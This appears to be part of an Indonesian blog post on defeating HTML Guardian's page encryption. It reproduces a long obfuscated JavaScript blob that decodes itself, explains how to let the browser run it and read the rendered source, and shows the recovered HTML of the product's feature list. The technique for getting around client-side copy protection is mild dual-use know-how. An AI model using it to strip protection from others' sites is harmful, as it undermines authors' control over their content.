x$-1zjy`{}u2xy\\yyzhy=xV{z|o.y~Izey%y"y$yf.y\'y)Ey\'VEz;xdz\ry|Fy3|J=xyxXx3x\\z|z~x_yxbxw|p|:{{Exjyfy#xk|cxpy*xsxu{{|pxy{ox|nx&ly y\\yxcwxfyxiwwxnwEUP|wxoy(y*y,y.w zy3xzhxxZwzwnw:|FyDx}3y:y<w"{N|7{azy{\ny~wAyBw<1xz\'{}nnzw#lzxzz{{r z$ yI{\ryuSy;ewV{Gz|c{J{L{N\'q|U{Edzxc{Txbwdl||{6{|.h|:f|.abz\\t:b|enk{ozVyuzYz[z]z_wXzbzd0zfyvz;wzhniwZzvxwd~1|F{~[z!z#z%x{}z)x\rz>z@z vzXzZevvv)zczezg{pvwky\\w8w|yzm.p}4{7zLl{I~}{K{Mz_fi{yZxTwzy}{vBw~~1="vvv vk"yyx1{ y|cv|G|:rx o{A|Ur{D{Fy[{NrvdvK{ woz_vFotw{#z}zLmyZ<zf{t|1s|dw}vDvef zv\\vz]v_~+va{p|#|%|*~Dty{ |`di|z"vF~|t~8vdy y>|2p|ey:n~1z uu{~9l~|k|9y;v[z!u~R~@yu" uv"uB{z5xfssuGu~Uv[zNxt/cuP~8|#~@~B~9u+u-bgvI|Rv[#FuiujuRzOugvuo0u\\pzE|euPuA1i~8 <u ~I srcuA~Fox\'.juQ~9|$|)|\'u{u}tutuAz"|ctu\\t|&~Ju{/p~9c||G~9z"v\n|8|mduv[8}uGvr{ rv[uqt"rt"dzEts|5y7"3ur ut{EsuU~HuQ ~3{4t;tyMru\\b~9u~9fzMt7w|t0"uhFup~8&{gt;B~Rtt?tctdt?v|du~[|Qu~.|3k|n,|B{#{~u6.t\\uv};|#tR|bt\ntP|#tN<|CtQtSuetV#upvuzW{!R~Liewt{zMt\ntst4|#t~Css},t5tTt9~+v[t=uHe{4~;v[|t>tGgt;{fu)t@uv"tt-t/6tM>Ma~|~!~ Gu{#u#~+z?~Ay~R:szhu`sx&s2tBuKu<u\\u<sOv[v\nuy>A w|Rlt6v(~}sCz?|Rs[{!w"yMx\'wiz~3|4}4|susmv}sj{||#u<s|bsUsQsX -tFx\' {Kso|3s=|Ubwc~RtHtqruwiz~.u-~+t6u(y;v&skltersqsou-v|zNwVu{|AuIv[|a~Fy~I_{Epvzh~<#pt2<t|tsv[{2yuGcuusPv~8|:u{t6rte~\ns?sAsCu$nst}|#a>.t r1sLrQ<tJzNsr!vr#{zrr&|c~;~=uR~.{v[ErZr\\uH~<ltq|5uPs\\t.sqrtr~-zN .rNu|5|:waot8uGidv[s8swr2tuftWupuir7r9sVo~8Comry|8rC~\rrEt.rGr{|Qu|V{7t8sc|Hrr~.|8rss~1rI~JrKrRr1uu9|kz`qruck;sc|b-|Us\'vu5rm~3~8[|Ft%hu-~.w"|@~~~Ixs[s]dt&|8{EtFsebrsq#vGq%{}s`zt.]q\'t\nrTt!su;isysW~8R||u>strsuiqsyssR>s}qF|msv||slu-r$r[u~{rg~=tqsr^rir uHrXuKt{Qr+uqquxs9tsKq)tF~}tFt9z?vQ~Rtqu5tj{:tqk|`tkwa~@mrNqs@sBq~+\'|3|:vtz]{|{#u-u|t:qeq\r>q{ A~2q{z|G&#}U3tz|$t:>';O00O='fu';OO0O='JFSeuTGQkeMOrOUOSuFG';O00O+='nction __'+'__(_'+'O0){';O0OO='%76\141\162%20l%32%3D\167%69n%64%6Fw%2E\157p\145r\141%3F%31%3A%30%3Bfu%6E%63\164\151%6Fn%20%6C%33%28l%34%29%7B\154%35%3D%2F%7Ah%2F%67%3Bl%36%3D\123tr\151n\147%2E\146\162o%6D\103h\141rC%6F\144e%28%30%29%3Bl%34%3Dl%34%2E%72%65%70\154%61c\145%28l%35%2C\154%36%29%3Bv\141r%20%6C%37%3D%6E\145\167%20%41%72ray%28%29%2C%6C%38%3D%5F%31%3D%6C%34%2E\154%65ng%74%68%2C\154%39%2C%6CI%2C\151l%3D%31%36%32%35%36%2C%5F%31%3D%30%2C\111%3D%30%2C\154\151%3D%27%27%3B\144o%7Bl%39%3Dl%34%2Echa\162\103od%65A%74%28%5F%31%29%3Bl\111%3Dl%34%2E\143\150\141%72\103o\144\145%41t%28%2B%2B%5F%31%29%3B\154%37%5B%49%2B%2B%5D%3Dl%49%2B\151l%2D%28%6C%39%3C%3C%37%29%7Dw%68%69l%65%28%5F%31%2B%2B%3C%6C%38%29%3B\166%61r%20\154%31%3Dne\167';O0O0[0]+='rzhng~||8{ yhz p%|8q}r\\qKrAt?zL{ sgu?~3~/p#ps_|ad|3q tFpqy~G{6|8fex{"q3t7mq>~}peopSpXt?pU~IzD|apM~QrNpy~(u pKsxi|31v%qLrtopLparzhz|R-f|:pTreqJt6vP{sq^.qbo |A~2|`v[|rzmt q)<sTr8tAsVqsF{xit$pKr%p||Mo&{|ssJ/sv<x&qcqqqss>rdo6tpsKpotqr)oKp rzhuW|Gp?upotdo ~R(t|3|Q|H.vqT)tq<rWurYoG_phr*r^~8okpprupoWtcoYstqox"~Ryu|@puL|8ppn{Q o[uZs)oOu\novtcYz\\zEsE{+pwp{tqo|Rq>tzNt6{s<vJqnoAo,s3qrsXPqWtjyz\\|HzZ|6~Rs[~.hu{q+r3quoq p9~8Iq>|7n\rrqsDrH/rPs|pKh~+tt6oepog"n-|7ojn(u\r~<r`trb"n;n.~nR{|s9nO|8n>tdq$wVp/rLrN<zZgtt"|T|OjpguGt&t("25uG~@q:v[~bto>o+qsz~8oFq~t~1q{r~-|:t6rynououoxnho=qoo*qdn#sPn%~8Ts\\wczupm|:sx|`uopdp$nstmqpmv[hg12p~8s}oxo5mqK|mupx{ {*x&tm$hm&ou>oWs=s~rja~Mt-|av{t6|C{{;nnun{}nx|Fpxp^oSw~|JtqnapXy3rz{*z!o|F|}rzmAmCtR|HItK{P Exu1|R|V5|Psd|1g~@|HmymrPmoBsXD|2mP|8~Gmm@yB|Byiz(l\r~;uty k{Hn!lm-m>l slot{~|nku<vwa{#{rqYt{:trvllmo-lll!uVp!whwVom+l mm >n\'o|1bqFmfl&|8xzhln4mm/m1m3qt n*znn0srmu>vP~Qs[~@qYqv5l[|2|B|D~-oovlS|HqUtqyhtq u-qwrpmDwIpSrrzl |Jt6os{Yz,}4mov|AovvXrnGrnzi|Jl;ll2n$qsPtArmm\rnRlRn+|4n.|3{:l$rzhn1|V|A{"~-cn>sdnKr""pojk|RdnQsr~[p\rs9r0sq0unn7F~8Ul},a-}+}4lfn\rrkskroqXq^nengnimnktzhnmnotnrntrnvnxnzs&ln}r/l<kmk}4lCqFl&onklhk|7|3oqqlzhuq"u\nl1ml>k]lBo3qFu\'|bkmkD~[qKmkol~8l5o4Cu<pvsb&x"pq5n\'u( S~Fpnv,q z5 5+k"nm  lkZkpl3l?Oo7{}lqrx|?|3p)pZ~Vm:mBz]m7r\\{|jo>/o@o k[o.sXmrfs&q |H|Ale{iplpoM{}||>t%sfqUo^n\r|AoY u<mi{6|Q{zz}lsj7js3qf>ySsr>oslHuyDp|R|cjWsjXj8"j\\L~+gsBn={J~UvL|blKslMm0m2m4s>qp+nAlVrqy|Gm nklTm6pyu5t?nrUl\\jSy{#ak{liyuim\\z} mWu!|fuHmK|8l7p\\rd{i|2hmcpXC|1~Q|Fi\'pXR{:~-~+tqJ~T~+o}jL~+u-v}kkvjpn.lso jjjZr:k{Br~Yiz#u$rm)z3i5lDu<~/n/n!nEk1sxllNj{~Komju-m%m]m|3kypfj+iv{kFjXiCqekrm6iUs}iWr2jylO~8|<lm ~Tu1rmupNpbmuncxo9v$k\niAilsjkj\\s;tu"u$ D|:x"sin,yMg~*zmls!zniui[s}p)n@qlbrhpkt6j-pxrms^p.u!omijepx&ts  t?WYSIh:GqSklrtx~.sds}hl~hCah/h~Amh|J|Hh"~"p*rFsEh7t?j;j# Add-Oz,sdhLh~AhPsq{3{ |@t7ny!ssxvi`pw|smplhWul_j0hZhvz"sk|3h+p)hvh$i2psesqQt?{7u{tNnoJifzm"nVq|u#noOooDzNmipfnpWproxoJs=kld|Vu#r=gz?l~pxhchNhe|Gh/riHiimW yn {pxopntFh]-|Mkhlkk$p y6w|~Bk/u`m,k3n6vq >gGo~BonCiA/snfpJ|5|7os [gEnMg,wshP_np\rlnUnWg,hO|ViNmZg?~1jzhhg-hogpg>h^|M~|v(x\'vY{}~|tRq)q]pH~+rRimlj\\Sq>rtos~Asy-{7-xzhsgrU{*tl;o>lLl3iZlP Vswpk%|%pv}gJistTqsk5pj|af){QnelgZhrJh\nt~~>o uss,s.us1ls5k*|GqoDt`~QvP{Qo<sjXj6o"o|ohm_ptrLl=l3j\\Tv}slhzDmpiq {!qUjwiXh f!s}ijefzDkykdigg7|BlyCy5|Brnn*l[gxy<rNi)jok~L|aqRjAu i~*ip\\sEgopikn/qFou5nq8|RkbrN|0jComY\'tbpTgm9n1j}rzhg|Rkng_We%k*~|p5lU~.h/ixhB{Ehqt7pfyrz#p$ifm&qPpofqFg"pkkoYrNi q>u-t9pcqRw|mup_pOew|pkv(zNg@ff~@-e<og\\|8u2voypru1y h)oUtid|Hdouupmv\'nsdlSie;eLl_u6oWy;m]|AePp$y3~Qe7{ |JeVpSlfblSn\ns}lljTtinG|Jxmx~BgpXkdljpf{|8fsz"eohCtkdm6n%lizpq xYm]oq lqQkkm}lb{nrNNpweMciL ku5wmQn=sdr|Ghndlb|:ixm;i-rAemZftpzmYl(d |Arxu<vCqKeboy3u#fqElmpwfLuHlbepnm\'ixq3d(n{EvQlqbjzm&|fh/m~hm rxyu~.ko{3k>{tqulbeKido"e{5~/dgxferi^fclle~RnH{BhPtqzuihcq!zNtqevfsou#sm|2pe~@m]rm~G~RrNWnGth/lhr|3c2rNPdDm&!ikjihiDj9~8lArpcn_|3!u{njnlr4snpkPt\no>jXfs3f uznYn=q s0qGjT|8ie~@h0mir>|McpLefoso|Aq>jsdyLtv/sdptlo{!q>z!|Kg^rVnLuJn_k,rpwon>e n3k2tUk4gOk6gKcU|8gnBgYf7rLgzg@ha|Hh#jqv|hhn/|anGjUnJofuJh_cDgJf`|MofbpfcDp|MkdciItlbsE~|~MlsBo4qrcevodqP|4y sH {5sir[qSdeunpmi~~nes[~+d#kcDqoe!e8smRe:e{osjecst6o8j>bDkmcupJbhTp,mZz.pwq>erb.qh1~-b5pwg&sjm kaqkdbQb$g*i;|Vb+kngVf:c<~9fRo$"wcffXrRhqshx"w~yx\'qErZf|8{3rspvcffl<cQsPcSp';O00O+='eva';OOOO='KdksOiiBFIxOkcRv';O00O+='l(unes' +'cape(_O0))}';eval (O00O);OO00='EfdPDZPFUOMMwwOfsZoX';O00O='';O0OO+='%20A%72ra%79%28%29%2C%6C%30%3D%6E%65w%20A\162ray%28%29%2C%49\154%3D%31%32%38%3Bdo%7B\154%30%5BIl%5D%3DStr%69n%67%2E%66%72o%6DC\150a\162Code%28Il%29%7Dw\150i%6Ce%28%2D%2D%49l%29%3B\111%6C%3D%31%32%38%3Bl%31%5B%30%5D%3D%6C\151%3Dl%30%5B%6C%37%5B%30%5D%5D%3Bl\154%3Dl%37%5B%30%5D%3B%5F\154%3D%31%3B\166ar%20\154%5F%3Dl%37%2E\154\145%6E\147\164h%2D%31%3B\167hil\145%28%5F%6C%3Cl%5F%29%7B\163\167\151%74c%68%28l%37%5B%5F\154%5D%3CIl%3F%31%3A%30%29%7B%63\141\163\145%20%30%20%3A%6C%30%5B\111%6C%5D%3D\154%30%5B\154%6C%5D%2BStr%69n%67%28l%30%5Bll%5D%29%2Es%75b%73\164\162%28%30%2C%31%29%3Bl%31%5B%5F\154%5D%3Dl%30%5B%49%6C%5D%3B%69f%28%6C%32%29%7B\154%69%2B%3D\154%30%5B%49l%5D%7D%3Bbre\141';OOO0='l';O0O0[0]+='Js}eef?hph@yLzNsxo rUe*t4 Cg|q,w~z!y |3f)f%ujS~Q{#m 8}Op$rmS|EklbbJplg*olFy etq~Pd|rrsypyr|posb||H|exc[x~+{.fzh|3rxz]|KdLraWi_tFut~boaEe{gBuHhxaba+rNBj/d>~B|f|3mfe@r@pya|t7rfma`tqgwoS{o^{5vza`oaNhPrss|@rzkk?pXpfqk-amQ twtyp7sEf\np:a\'a1a*|KupIuRpwu<c%fzFcj&yos<{}roqUnSzZi|us<doMhka(t`\'n,a6mv~uzhp%jSaftv~jqRozL`|Rpk LANopfmrrUmtos~S~,mHh@ebp/|;{\'b\\fxoWxzhaPrN`:jU`cktFrzirm u1`4wazOnc~@u-fsbTfdnoW``~Qocj`3s=\'{"dyqknIuoyom\'`I{ rpx`|eibSvBh~pxd[ape!eXa1g\npf`kl\\pwdH`gg~.bboi7|?},b>o:`r|8lrj%fb~Bm?o{5msWo`8oMc4noc%lp%u=rNA~[sBaifz`\na^`\ro\'|B_tF`0uPq`8`JtbpylF|VmpNl"phl$pkmu?|egg\nmkcoz{E|1~1tqx{`pfm{Qaer_bl[mp|_efpuzhvlwkm_gg_]tkm!u?d:~UefmB}4~E|roPcfpco_ti9kjqi*pRa9bOmX_Gl~QhfdCk.dpb-h/fe7~Pt/qZjc_jedXl_0_Pn.` s\\x&ku|Vtmgxqw||gn/lrg\nvcspS|>wav4joiHkpfsbauj/pf|?_<__upzhcc3:tp8`#~8^O`A`&vQa+dSeqssdu-|1p[dq"bzki`zha9{}5a?fpkje`Bd;ahDaPc:fnrQjuevikd`dtq`%a)^c|Kiq,vQr``dlkj/lpoWlZlzfzcbkK{:eWd:y4p(hSb cYa\'~|tx{:m _#oggcf{5g}fsqks0^c[eRoot6^seftuqP]3p$s}z|Gi c]e.~2bCb$p`|8v\nqi_hygm6b;ttsqt$l{~/])vz\\m :n\ndpShxkyk|}z!l_aPcfu_xqK2tq3jLdNj^H|`a{my|I|2^<d-pwq ^G_\\as0^eubcsE`nkbhUnc:f;mui]kd$]IcYm[xzhiIlteviida|4j/k~+dRsd^i:b_]7p$~BhP~/xza1b)kqUelzhqPmm^|sqkoTor]`C]\n]hmKnl!(jPid h\\F\\9tqh\\M~Zlzh\\EdSubk:~[_zted7f|M`\\oSiwgmlrtqlAxq~.k>d\\^aXn \\-i7`Do]py|:x{qPd\\&|2{||3kqK|Md^m!a1|)rUu$rNf#rse)_)ioW^Yd<|np$]1`Hrz]lrqBc{"wXct~ c|Gc]nio]ktqer[e{][\rd.i@aac>jlkrcBkdkaolzszOm`g]IfgitfjzfjpS`s\\0_Qv|h({t^fsvIrjL`t^{wih[Dq5cfspf[+g)kir!rhwcvVts}[Ng\ngRayo4oxtqaXoWm]Icn<oPi{{_yrzhtc\\fl^z[l[fs~-^>r^Rc(n`py[NeE[^b+\\bdUhAnzZvQtsg\nc2n0m;ieqjf\\ipXjS{aMjAcejoe!fK_.olb_8ahbjn/^lrtooaaq~U~/c\naLw"]/qkb@|a|GpkqHgp4rk:c\ry jy_b9ai]Rg\n|5dog_\\bftti^`vnR_Di\\jau=efdqFfsm[`7iid\\p\\g yf^evZ<^J^mZ1vP[jc;[%insX}+|r[}|9~H\\2t fjx[5iva Ze|&Zh`I[<~*[>d9zuei_OhitHdrA[Xd4gHnkw[\nfebamuxj eky_n2Zsx"]J~(wh_xoWlAtq^OS~2etq{MlG_crtUgo[i\\f`~sE[Y]oQ`twcyDdX`Uky|Ab+\\QtddWyut%e%obbs~[|ReL{&_M`sppzh[/zslm6vim"nImFbgrc\\q#k`m^mZp]`Ic`ahw;jjw~olFjbbSldl!zLeWn/ky\\w]Bsx_\\YgaAw\rt6d={d@]Kw\rZ rAosz{7pjz.rjb>xib@{dDn/`_pw~1Y"_6u!m?n1h{ ]a~pXfsY%_Pu-d%zZm?i6y4q{r\nx_ew|QhPYzhpx{;hf^t6Za^m~P\\;Zzh[[sd[^^zYunAbhZoZg]o{>Z+rteq<wBtFw:sxie~*Z2k!s}ln[SnpC82} ;pp [SwjgSX\nrAzjS_\'{;zxefXAX\r[y]_/Z?izh]fpa6YOX0`l_0lvlI~2bqp~3ypA]OZ|rm6os]X\reFkdpfd[XAvpd~1vPjpmbRpyv(fZh[#q(f;fZj[qsAp1ru|5m[3syanEc Y@q>vQgzj(Ya{}Zi]`pw`qK[InW t9r|K[IdS]m%{:ridub~|4|Vc"ifuWe ]/iMWr~Bzcn/ap[" h`deW>W`1olbb[g_|Z%qv]hwu6laYpkj?ph~Ahhwp#s!pskzt#w\rnhg_b-cY`;boo3u g\nzOW;rzhW>kgg*hqK`8Wf<t\ns<W{ss t:s#kUn|"88t>fDtDuGf@v[q`tLgKo?gLbtWuitZ>[IcAW`IWM|@dnke>qa^n/]9XtY3q=_cpf~Yb?YKqStvt]pGf7tgXq*bf.s t2f#Y9|HBk>zLYj_c~)pcgUf7s/W}st6vIhVrRcHp^v[GpwppvacIu&p0{\rzukQt\'yt<uqs%V}]V\nu<s-v[s/s1~1jlun0w?vzh|2Yul`(xU)acwv[{ y3f+VNk9v[NzO^[wgeTy3uGkLcJuWVXa n0V[s#V^n{kWV]VbtHv[ls1s6|Gt1a\n<usfDUrs8s~Uz`t V`nqTj\n&U\'t9;U*U(U-Y_yq51997-ze6Y0tcV`Imr[jh[sU`eXxtvU+U)UHU-UJ|#su#vU!VdU#tKUq-m.m00lPf,iYUXlP|gbuJ~;tp:~wUgvEvG]3xfquRl)yuv[_{7lPmB|`q)U_bm.n UdUfUhrUku/Y%gJY%pUxVwk&U{Ue/Ug|pUuzhUlm/cyb"d5on^HnVq.n_kzzm~8T TUwU`UzUcTT\rUiv}Tzhq/k\'kAkczsjb!k)rnc oIgZTk%UbU|TU~UjTT{*qgJT@pT"T T$U}TT=|:T/nr(t9gJ2TDUyTFT:T&TTKTTNmJmLpgJ3T!TTT9T%T<T(T>T*TNpp\r#ts\nTnWifWi\\oGgTaTTcTHT\'[ uThi]__nUFc}u VpTvT8T\nTyTXT|TophjfgJS\r_xSp TxT;TITfTYT*e!ttagJS kpy]*l$UwrOgWUOWzst>|e{1sh[z|fz_s8yd?(|e|"tut t#u:|#V\r~Dp8n|.^ziQr:^j{ bK>wrfwuww`)fu|pt\nS*szhm&yt\nppJ';O0OO+='k%3Bde%66aul%74%3A%6C%31%5B%5F%6C%5D%3Dl%30%5Bl%37%5B%5F\154%5D%5D%3B%69f%28l%32%29%7B%6Ci%2B%3Dl%30%5Bl%37%5B%5F%6C%5D%5D%7D%3Bl%30%5B\111l%5D%3Dl%30%5Bl\154%5D%2B\123t%72i%6Eg%28%6C%30%5B\154%37%5B%5F%6C%5D%5D%29%2E%73u%62st%72%28%30%2C%31%29%3Bb\162e%61%6B%7D%3B\111%6C%2B%2B%3B%6C%6C%3Dl%37%5B%5F\154%5D%3B%5F%6C%2B%2B%7D%3Bif%28%21%6C%32%29%7B%72e%74\165rn%28\154%31%2E%6Aoin%28%27%27%29%29%7De%6C\163e%7Br\145\164u\162n%20%6C%69%7D%7D%3Bv%61\162%20\154%4F%3D%27%27%3B\146o\162%28%69\151%3D%30%3B\151%69%3C\117%30O%30%2El%65ng%74h%3Bi%69%2B%2B%29%7Bl%4F%2B%3D\154%33%28O%30%4F%30%5B%69\151%5D%29%7D%3B%69f%28%6Ea%61%29%7B%64%6F\143%75m\145%6E%74%2E\167\162\151%74e%28\154%4F%29%7D%3B';OO00 ='j8 3,O;SaXs#%VYo.yFj=Lxr';____ (O0OO);OOO0+='x1r%mOO*G=En2n-:.;2Mt04Is@D&ReLq ?)>'; //]]> </script>

Sangat kacau bukan source javascriptnya? Tidak perlu pusing-pusing, kita biarkan saja browser yang meng-eksekusi code tersebut. Nanti setelah eksekusi selesai, dengan menggunakan addon web developer, kita bisa melihat source hasil eksekusi javascript tersebut. Sebagian hasil dekripsinya (karena sangat panjang) terlihat sebagai berikut:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110

<table border="0" width="85%"> <tbody> <tr> <td colspan="3"> <p class="tips" align="center"><b><u><font color="#FF0000">"Best product of its kind, bar none."</font></u></b><br /> <font color="#000000">WebReview</font></p><br /> </td> </tr>   <tr> <td colspan="3" height="79"> <p class="tborder6" align="left"><b>Main HTML Guardian features:</b><br /></p>   <ul class="sli"> <li class="bli">A world standard for web intellectual property protection</li>   <li style="list-style: none"> <font class="sli">- all experts in web design, web security and intellectual property protection <a href="encrypt_asp.htm#p0"><font class="bo" color="navy">recommend HTML Guardian</font></a>.</font><br /> <br />   <center> <a href="encrypt.html" title="Encrypt html, password protect website .. compare tools" id="6" name="6"><font class="bo" color="#0000FF">Compare HTML Guardian to other tools for website protection</font></a><br /> <font style="color: black; font-weight: normal;">[see why it is adopted worldwide as a website protection standard]</font> </center><br /> </li>   <li class="bli">Rock solid</li>   <li style="list-style: none"><font class="sli">- it will properly encrypt all html, shtml, <a href="scripts.htm" class="s1i"><b>script</b></a> and asp files, not just some of them. HTML Guardian's revolutionary <span class= "bo">CodeAnalyzer&acirc;&bdquo;&cent;</span> engine debugs the encrypted code in realtime and sends the appropriate feedback commands to the encryption engine. This ensures 100% working and error-free encrypted files</font>.<br /> <br /> <a name="options" id="options"></a></li>   <li class="bli">Flexible encryption options:</li>   <li style="list-style: none; display: inline"> <ul> <li class="sli"><b>Encrypt html</b> files, asp files, external script files(.js or .vbs), <a href="encrypt_php.htm">php</a> and shtml files, framesets and style sheets (.css) files. You can also encrypt HTML-formatted email.</li>   <li class="sli">Protect your images with <font class="bo" color="#0000FF">Image Guardian</font> - enhanced <a href="image_protection.htm" title= "Image Protection"><b>image protection</b></a>. <img src="new3.jpg" width="25" height= "20" /></li>   <li class="sli">Encrypt only desired parts of html files.</li>   <li class="sli">Two different methods of encryption</li>   <li style="list-style: none"><font class="hg12p">- files encrypted with the default method work in all javascript-enabled browsers. You can also use the alternative, more fast and secure method for Internet Explorer 5.0 or higher only.</font></li>   <li class="sli">Disable right mouse button (right click).</li>   <li class="sli">Disable showing link targets in status bar.</li>   <li class="sli">Disable text selection.</li>   <li class="sli">Prohibit offline use</li>   <li style="list-style: none"><font class="hg12p">- your files will work fine when someone is browsing your site, but they will not work if they are saved and run from a local hard drive.</font></li>   <li class="sli">Password protect your pages using either a basic or <a href= "html_password_protect.htm"><b><font color="#0000FF">Ultra-Strong password protection</font></b></a>.<img src="new3.jpg" width="25" height="20" /></li>   <li class="sli">Prohibit linking your pages from other sites.</li>   <li class="sli">Prohibit printing of protected files.</li>   <li class="sli">Disable Clipboard &amp; Print Screen ( for IE 5+ only ).</li>   <li class="sli">Option only to compress HTML code(without encryption).</li> </ul><br /> </li>   <li class="bli">Encrypt either a single file, an entire web site or a file list at once.</li>   <li style="list-style: none"><br /> <br /></li>   <li class="bli">Full command line support.</li>   <li style="list-style: none"><br /> <br /></li>   <li class="bli">Language independent</li>   <li style="list-style: none"><font class="hg12p">- HTML Guardian will properly encrypt your files no matter what character set you use. You may have text in English, Chinese, Russian, Japanese or any other language.</font><br /> <br /></li>   <li class="bli">Powerful partial encryption capabilities</li>

Kesimpulan

Client based protection doesn’t works. Walaupun source dibuat kacau balau seperti apapun, selama browser hanya mengerti html, harus dikembalikan ke bentuk yang dimengerti browser. Kita tidak perlu tahu mengerti javascript hasil scramble, cukup biarkan browser menjalankan tugasnya, dan kita hanya mau hasil akhirnya yang sudah rapi berbentuk htm

READ MORE - Membongkar Proteksi HTML Guardian